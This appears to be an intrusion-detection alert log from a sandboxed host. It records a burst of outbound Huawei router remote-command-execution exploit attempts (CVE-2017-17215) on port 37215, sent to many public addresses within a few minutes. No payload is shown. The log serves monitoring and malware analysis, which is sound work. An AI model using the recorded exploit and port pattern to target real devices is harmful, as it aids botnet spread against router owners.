                                            06/14/24-10:43:52.164042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634437215192.168.2.14156.95.161.193
                                            06/14/24-10:43:56.243488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347037215192.168.2.14156.64.85.204
                                            06/14/24-10:43:58.295004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462837215192.168.2.1441.236.252.187
                                            06/14/24-10:44:12.625231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550637215192.168.2.14197.162.89.224
                                            06/14/24-10:43:45.965393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781237215192.168.2.14197.183.35.97
                                            06/14/24-10:44:00.340097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.14156.136.189.29
                                            06/14/24-10:43:36.704643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438437215192.168.2.14197.107.203.197
                                            06/14/24-10:43:50.072997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649037215192.168.2.14156.110.7.155
                                            06/14/24-10:44:18.761584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852237215192.168.2.14156.154.163.8
                                            06/14/24-10:43:56.245783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313637215192.168.2.1441.7.174.148
                                            06/14/24-10:44:16.737715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774437215192.168.2.1441.143.89.41
                                            06/14/24-10:43:58.290951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788837215192.168.2.14197.225.174.77
                                            06/14/24-10:43:39.810168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.14156.134.53.157
                                            06/14/24-10:43:48.017719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100037215192.168.2.1441.31.189.227
                                            06/14/24-10:43:58.289734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687037215192.168.2.1441.188.95.61
                                            06/14/24-10:44:12.618233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363437215192.168.2.14156.101.154.179
                                            06/14/24-10:44:02.383671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298437215192.168.2.14197.200.225.148
                                            06/14/24-10:43:48.020343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005237215192.168.2.1441.185.64.228
                                            06/14/24-10:44:00.338412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450437215192.168.2.14197.32.157.124
                                            06/14/24-10:43:36.704824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464637215192.168.2.1441.86.162.204
                                            06/14/24-10:43:56.224891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352237215192.168.2.14197.102.81.28
                                            06/14/24-10:44:12.615011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144037215192.168.2.14197.253.217.25
                                            06/14/24-10:44:29.012090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381237215192.168.2.14156.24.126.252
                                            06/14/24-10:43:45.985454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663437215192.168.2.14197.94.213.216
                                            06/14/24-10:44:29.010485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668637215192.168.2.14197.186.252.67
                                            06/14/24-10:44:31.094362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083237215192.168.2.14156.26.144.224
                                            06/14/24-10:44:18.777519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998237215192.168.2.14197.101.12.229
                                            06/14/24-10:44:14.683508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590437215192.168.2.1441.159.12.245
                                            06/14/24-10:44:00.341936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444037215192.168.2.14156.55.147.51
                                            06/14/24-10:44:29.011457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974237215192.168.2.1441.218.64.143
                                            06/14/24-10:44:33.152055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332437215192.168.2.14197.158.33.19
                                            06/14/24-10:44:18.763396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546237215192.168.2.14197.3.196.123
                                            06/14/24-10:43:56.230522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297637215192.168.2.14156.189.173.227
                                            06/14/24-10:44:02.384331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411037215192.168.2.1441.82.81.19
                                            06/14/24-10:44:00.325983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365637215192.168.2.14156.231.128.51
                                            06/14/24-10:44:08.517774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251837215192.168.2.1441.48.195.197
                                            06/14/24-10:43:39.789533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786837215192.168.2.14156.189.190.39
                                            06/14/24-10:43:48.017894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286437215192.168.2.14197.112.93.246
                                            06/14/24-10:44:14.688082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229437215192.168.2.14156.78.211.198
                                            06/14/24-10:43:41.899265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756837215192.168.2.1441.84.195.145
                                            06/14/24-10:43:50.110839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815437215192.168.2.14156.183.219.54
                                            06/14/24-10:44:02.382094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811837215192.168.2.14156.139.123.21
                                            06/14/24-10:43:37.772551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604437215192.168.2.1441.179.177.144
                                            06/14/24-10:44:16.716328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795837215192.168.2.1441.42.139.94
                                            06/14/24-10:44:00.338209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820437215192.168.2.14197.128.40.230
                                            06/14/24-10:43:45.965761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738037215192.168.2.14156.62.209.100
                                            06/14/24-10:44:33.147929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638437215192.168.2.1441.38.55.110
                                            06/14/24-10:43:39.791428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874237215192.168.2.14156.221.59.122
                                            06/14/24-10:43:48.019851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447437215192.168.2.14156.170.77.26
                                            06/14/24-10:43:41.906127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689837215192.168.2.14197.108.47.56
                                            06/14/24-10:43:50.070683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719437215192.168.2.14156.216.245.7
                                            06/14/24-10:44:02.382975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598237215192.168.2.14156.143.115.38
                                            06/14/24-10:43:56.225348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132837215192.168.2.14197.43.86.252
                                            06/14/24-10:44:06.472915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050837215192.168.2.1441.175.98.35
                                            06/14/24-10:43:34.675960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14156.95.138.20
                                            06/14/24-10:43:34.679252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847437215192.168.2.14197.79.30.8
                                            06/14/24-10:43:52.159250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364837215192.168.2.1441.17.166.251
                                            06/14/24-10:44:10.547792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455037215192.168.2.14197.194.216.252
                                            06/14/24-10:43:41.906472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674837215192.168.2.14156.56.142.46
                                            06/14/24-10:44:22.878634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003637215192.168.2.14197.132.243.94
                                            06/14/24-10:44:04.422278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597637215192.168.2.14156.121.127.129
                                            06/14/24-10:44:16.717523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.1441.26.89.85
                                            06/14/24-10:44:26.986308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699437215192.168.2.14197.193.153.198
                                            06/14/24-10:43:41.899293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450237215192.168.2.1441.87.242.207
                                            06/14/24-10:44:29.022749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969237215192.168.2.14156.71.146.175
                                            06/14/24-10:43:36.722132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451637215192.168.2.1441.130.45.29
                                            06/14/24-10:44:22.861061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072437215192.168.2.1441.13.214.61
                                            06/14/24-10:44:31.092736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141037215192.168.2.1441.235.124.5
                                            06/14/24-10:43:58.293298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533237215192.168.2.1441.145.129.129
                                            06/14/24-10:44:29.011512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473437215192.168.2.14197.32.169.167
                                            06/14/24-10:44:00.321789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396837215192.168.2.1441.79.76.164
                                            06/14/24-10:43:56.229066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607437215192.168.2.1441.107.32.161
                                            06/14/24-10:44:02.364958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310637215192.168.2.1441.193.22.138
                                            06/14/24-10:44:26.997041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669237215192.168.2.1441.176.68.32
                                            06/14/24-10:44:33.133136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982637215192.168.2.14156.38.139.140
                                            06/14/24-10:43:58.277528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198637215192.168.2.14156.12.170.36
                                            06/14/24-10:44:06.451714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048437215192.168.2.14156.122.137.27
                                            06/14/24-10:43:48.032120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.14197.95.191.67
                                            06/14/24-10:44:18.761390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755437215192.168.2.14197.50.187.249
                                            06/14/24-10:44:00.340000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550837215192.168.2.14197.96.122.184
                                            06/14/24-10:43:39.811261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472037215192.168.2.14197.169.57.44
                                            06/14/24-10:43:41.848576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057237215192.168.2.14156.39.180.25
                                            06/14/24-10:44:04.419813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054837215192.168.2.1441.138.13.191
                                            06/14/24-10:43:56.230879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200437215192.168.2.14197.232.5.220
                                            06/14/24-10:44:18.777558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994837215192.168.2.1441.85.199.145
                                            06/14/24-10:44:14.683332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167237215192.168.2.14156.74.201.249
                                            06/14/24-10:44:00.324169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131237215192.168.2.14156.218.90.26
                                            06/14/24-10:43:41.900240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898037215192.168.2.14197.40.161.110
                                            06/14/24-10:44:10.544731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917637215192.168.2.14197.237.138.157
                                            06/14/24-10:43:58.293534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401637215192.168.2.14197.75.27.89
                                            06/14/24-10:44:08.503601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246637215192.168.2.14197.200.124.140
                                            06/14/24-10:44:00.340900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660237215192.168.2.14197.146.69.216
                                            06/14/24-10:44:00.343749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915437215192.168.2.14156.138.190.104
                                            06/14/24-10:44:04.419754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087837215192.168.2.14156.177.160.156
                                            06/14/24-10:43:45.968454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015437215192.168.2.14197.45.201.101
                                            06/14/24-10:44:20.828618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857037215192.168.2.14197.62.192.159
                                            06/14/24-10:44:20.830750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928237215192.168.2.14156.189.102.48
                                            06/14/24-10:44:04.421149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490637215192.168.2.14197.206.132.163
                                            06/14/24-10:44:31.081643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3949437215192.168.2.14197.29.10.182
                                            06/14/24-10:44:06.471439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660237215192.168.2.14156.159.229.193
                                            06/14/24-10:43:58.275279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547437215192.168.2.14197.252.83.8
                                            06/14/24-10:44:29.011899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598237215192.168.2.1441.76.113.195
                                            06/14/24-10:44:16.737776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616637215192.168.2.14156.209.19.32
                                            06/14/24-10:43:48.021449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194037215192.168.2.1441.90.6.169
                                            06/14/24-10:44:10.567265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3642837215192.168.2.14197.223.175.23
                                            06/14/24-10:44:26.996999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197037215192.168.2.1441.132.224.174
                                            06/14/24-10:44:08.500835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808237215192.168.2.1441.165.41.121
                                            06/14/24-10:44:29.024249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875437215192.168.2.14197.198.217.156
                                            06/14/24-10:44:33.132515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481237215192.168.2.1441.11.227.31
                                            06/14/24-10:43:37.762928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790837215192.168.2.14197.28.131.87
                                            06/14/24-10:44:31.079028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013437215192.168.2.1441.98.62.141
                                            06/14/24-10:44:26.979168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074637215192.168.2.14197.27.57.235
                                            06/14/24-10:44:14.683463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567037215192.168.2.14197.168.219.215
                                            06/14/24-10:44:08.503268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613237215192.168.2.1441.26.98.231
                                            06/14/24-10:43:41.850762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391837215192.168.2.14197.75.132.120
                                            06/14/24-10:44:22.878448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479037215192.168.2.14197.47.102.166
                                            06/14/24-10:43:34.675375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503237215192.168.2.14197.95.168.17
                                            06/14/24-10:43:43.940561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938637215192.168.2.14197.186.61.168
                                            06/14/24-10:44:04.408150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516237215192.168.2.14156.73.202.13
                                            06/14/24-10:44:20.807352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540037215192.168.2.14156.107.251.137
                                            06/14/24-10:44:29.013513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036637215192.168.2.14197.68.204.101
                                            06/14/24-10:43:45.969511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854637215192.168.2.14197.244.93.20
                                            06/14/24-10:44:12.614393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317837215192.168.2.1441.214.203.32
                                            06/14/24-10:44:22.881773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403837215192.168.2.14156.255.120.200
                                            06/14/24-10:44:29.025611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.14156.232.128.0
                                            06/14/24-10:44:12.615962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310837215192.168.2.1441.227.169.149
                                            06/14/24-10:44:22.861768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292637215192.168.2.14156.187.28.148
                                            06/14/24-10:44:33.134316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5051437215192.168.2.14156.188.36.31
                                            06/14/24-10:44:14.681680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278637215192.168.2.1441.174.236.36
                                            06/14/24-10:44:31.084546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219237215192.168.2.14197.150.82.160
                                            06/14/24-10:44:16.737633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741237215192.168.2.14197.122.152.27
                                            06/14/24-10:44:29.012766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197037215192.168.2.14197.246.188.151
                                            06/14/24-10:44:00.322246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768437215192.168.2.14197.6.113.110
                                            06/14/24-10:44:00.325538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698237215192.168.2.1441.121.94.166
                                            06/14/24-10:43:41.902023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382637215192.168.2.1441.88.56.234
                                            06/14/24-10:44:06.453256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001237215192.168.2.14197.49.215.54
                                            06/14/24-10:43:54.185067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714037215192.168.2.1441.48.141.188
                                            06/14/24-10:44:16.715690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153837215192.168.2.14197.57.77.39
                                            06/14/24-10:44:20.828446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598037215192.168.2.14156.82.138.221
                                            06/14/24-10:44:29.024869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284437215192.168.2.1441.224.249.39
                                            06/14/24-10:43:39.790210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.14197.42.252.165
                                            06/14/24-10:43:54.186180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288837215192.168.2.1441.108.114.82
                                            06/14/24-10:44:00.323070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966237215192.168.2.14197.135.191.252
                                            06/14/24-10:44:26.985738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006637215192.168.2.14197.209.200.110
                                            06/14/24-10:44:02.384364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642837215192.168.2.1441.123.11.17
                                            06/14/24-10:43:34.661122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598637215192.168.2.14156.97.90.225
                                            06/14/24-10:44:12.618330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514037215192.168.2.1441.44.126.164
                                            06/14/24-10:44:14.670427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945637215192.168.2.14197.130.236.42
                                            06/14/24-10:43:56.229489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072237215192.168.2.1441.229.95.14
                                            06/14/24-10:43:56.226430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030637215192.168.2.14156.208.21.153
                                            06/14/24-10:43:56.230571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597437215192.168.2.1441.28.161.243
                                            06/14/24-10:44:22.860959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543037215192.168.2.14197.200.195.201
                                            06/14/24-10:44:31.089792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568637215192.168.2.14156.203.21.171
                                            06/14/24-10:44:31.052532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3333437215192.168.2.14197.65.196.81
                                            06/14/24-10:44:08.502350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617237215192.168.2.14156.198.60.179
                                            06/14/24-10:44:35.183114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028637215192.168.2.14156.230.23.73
                                            06/14/24-10:44:10.543017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666237215192.168.2.14197.64.218.110
                                            06/14/24-10:44:02.366623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021837215192.168.2.14197.93.43.242
                                            06/14/24-10:44:20.804229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493837215192.168.2.14156.114.245.224
                                            06/14/24-10:44:18.778939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342437215192.168.2.14197.2.89.94
                                            06/14/24-10:44:12.646421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773837215192.168.2.1441.235.1.246
                                            06/14/24-10:43:41.849420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368637215192.168.2.14156.200.186.99
                                            06/14/24-10:44:02.366562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968837215192.168.2.1441.182.9.240
                                            06/14/24-10:43:56.227807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724837215192.168.2.1441.169.209.110
                                            06/14/24-10:43:48.031459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894437215192.168.2.14156.100.93.206
                                            06/14/24-10:44:20.829008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3971037215192.168.2.1441.236.12.53
                                            06/14/24-10:43:34.676065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545437215192.168.2.14156.214.90.252
                                            06/14/24-10:43:36.705321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186637215192.168.2.14197.200.116.255
                                            06/14/24-10:43:43.943657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744637215192.168.2.1441.211.182.182
                                            06/14/24-10:44:33.151996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062437215192.168.2.14156.164.86.131
                                            06/14/24-10:43:50.115483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267637215192.168.2.14197.233.146.139
                                            06/14/24-10:44:00.323036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128237215192.168.2.14197.210.194.29
                                            06/14/24-10:44:04.419106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422637215192.168.2.1441.21.33.25
                                            06/14/24-10:44:16.732520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601237215192.168.2.14156.246.96.131
                                            06/14/24-10:43:48.018758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957237215192.168.2.14197.177.151.17
                                            06/14/24-10:44:16.716493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906037215192.168.2.14156.252.187.38
                                            06/14/24-10:44:22.877543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784437215192.168.2.1441.253.171.24
                                            06/14/24-10:44:35.181805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513037215192.168.2.14156.190.97.198
                                            06/14/24-10:44:02.383695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218837215192.168.2.1441.50.89.108
                                            06/14/24-10:43:41.849250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590237215192.168.2.14156.53.174.60
                                            06/14/24-10:43:37.772428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155437215192.168.2.1441.166.30.213
                                            06/14/24-10:44:18.761132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263237215192.168.2.14197.245.74.148
                                            06/14/24-10:43:41.846197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768837215192.168.2.1441.201.39.196
                                            06/14/24-10:44:04.409656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935837215192.168.2.14156.33.141.64
                                            06/14/24-10:44:08.519119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624437215192.168.2.1441.155.238.169
                                            06/14/24-10:44:00.325313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734237215192.168.2.14197.126.236.196
                                            06/14/24-10:44:10.548655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885037215192.168.2.14197.174.44.39
                                            06/14/24-10:43:37.760781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023237215192.168.2.14156.11.77.17
